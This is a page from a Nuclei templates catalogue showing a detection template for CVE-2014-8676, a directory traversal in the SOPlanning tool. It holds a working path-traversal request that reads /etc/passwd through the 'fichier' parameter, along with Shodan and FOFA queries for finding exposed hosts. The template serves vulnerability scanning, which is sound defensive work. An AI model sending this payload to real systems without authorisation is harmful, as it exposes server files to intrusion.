Skip to content
Nuclei Templates

Simple Online Planning Tool <1.3.2 - Local File Inclusion

ID: CVE-2014-8676

Severity: medium

Author: 0x_Akoko

Tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss

Description

Section titled “Description”

SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2014-8676


info:
  name: Simple Online Planning Tool <1.3.2 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: |
    SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
    - https://www.exploit-db.com/exploits/37604/
    - http://seclists.org/fulldisclosure/2015/Jul/44
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
    - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2014-8676
    cwe-id: CWE-22
    epss-score: 0.00195
    epss-percentile: 0.56456
    cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: soplanning
    product: soplanning
    shodan-query: http.html:"soplanning"
    fofa-query: body="soplanning"
  tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a0046304402202a32136e3b5a9dbddd1d7fd2db755d443afe02667f8842f1773ba1944cf3ad0102205120821dbe25fff085b4bd4114e04c69bb97a5303bfff754dbf7a14c2370341c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-8676.yaml"

View on Github